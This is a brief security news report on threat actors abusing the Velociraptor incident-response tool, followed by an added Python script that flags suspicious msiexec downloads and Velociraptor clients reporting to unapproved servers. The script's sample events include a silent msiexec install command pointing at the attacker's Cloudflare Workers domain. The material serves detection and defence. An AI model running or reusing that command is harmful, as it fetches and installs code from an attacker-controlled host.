
Illicit remote access facilitated by Velociraptor incident response tool abuse

Open-source digital forensics and incident response tool Velociraptor has been abused to gain remote access to a targeted network, GBHackers News reports. According to an analysis from Sophos' Counter Threat Unit, threat actors used the Windows msiexec utility to download a further installer from a Cloudflare Workers domain, which in turn deployed Velociraptor. After configuring Velociraptor to communicate with the 'velo[.]qaubctgg[.]workers[.]dev' command-and-control domain, the attackers downloaded Visual Studio Code via a PowerShell command, installed another executable for persistence, and then invoked msiexec again to fetch additional malware. Because illicit Velociraptor usage is indicative of a subsequent ransomware compromise, Sophos CTU researchers said organizations should not only watch for suspicious tunneling activity and service installations but also deploy endpoint detection and response systems to scrutinize potentially malicious actions. Organizations have also been urged to implement least-privilege principles and maintain robust backup systems to better counter intrusions.
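Two of the behaviours above can be turned into simple detection logic over process-creation telemetry: msiexec pulling its package from a remote URL (here a Cloudflare Workers host), and a Velociraptor client reporting to a server the organization does not run. The following is an added example, not code from the article or from Sophos; the event shape is a simplified, constructed approximation of a Sysmon/EDR export, and the `server_url` field (assumed to be parsed from the client configuration) is an assumption.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events, loosely modelled on a Sysmon
# Event ID 1 / EDR export. They are not telemetry from the reported intrusion.
SAMPLE_EVENTS = [
    {"image": "msiexec.exe", "parent": "cmd.exe",
     "cmdline": "msiexec.exe /i https://velo.qaubctgg.workers.dev/pkg.msi /qn"},
    {"image": "Velociraptor.exe", "parent": "services.exe",
     "cmdline": "Velociraptor.exe --config C:\\ProgramData\\client.yaml client",
     "server_url": "https://velo.qaubctgg.workers.dev/"},   # assumed field from parsed client config
    {"image": "Velociraptor.exe", "parent": "services.exe",
     "cmdline": "Velociraptor.exe --config C:\\ProgramData\\client.yaml client",
     "server_url": "https://velociraptor.corp.example:8000/"},
    {"image": "msiexec.exe", "parent": "explorer.exe",
     "cmdline": "msiexec.exe /i C:\\Users\\a\\Downloads\\7zip.msi /qn"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def suspicious_msiexec(event):
    """Flag msiexec fetching its package from a remote URL; note Cloudflare Workers hosts."""
    if event["image"].lower() != "msiexec.exe":
        return None
    m = URL_RE.search(event["cmdline"])
    if not m:
        return None
    host = urlparse(m.group(0)).hostname or ""
    note = " (Cloudflare Workers host)" if host.endswith(".workers.dev") else ""
    return f"msiexec fetched package from {host}{note}"

def unapproved_velociraptor(event, approved_hosts):
    """Flag a Velociraptor client whose server is not on the organization's allowlist."""
    if event["image"].lower() != "velociraptor.exe" or "server_url" not in event:
        return None
    host = urlparse(event["server_url"]).hostname or ""
    if host in approved_hosts:
        return None
    return f"Velociraptor client reports to unapproved server {host}"

def triage(events, approved_hosts):
    """Run both checks over a batch of events and return the human-readable findings."""
    findings = []
    for ev in events:
        for check in (suspicious_msiexec, lambda e: unapproved_velociraptor(e, approved_hosts)):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, {"velociraptor.corp.example"}):
        print("ALERT:", finding)
```

The allowlist of legitimate Velociraptor servers is the key tuning knob: a client pointing anywhere else is the signal, regardless of the hosting provider.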
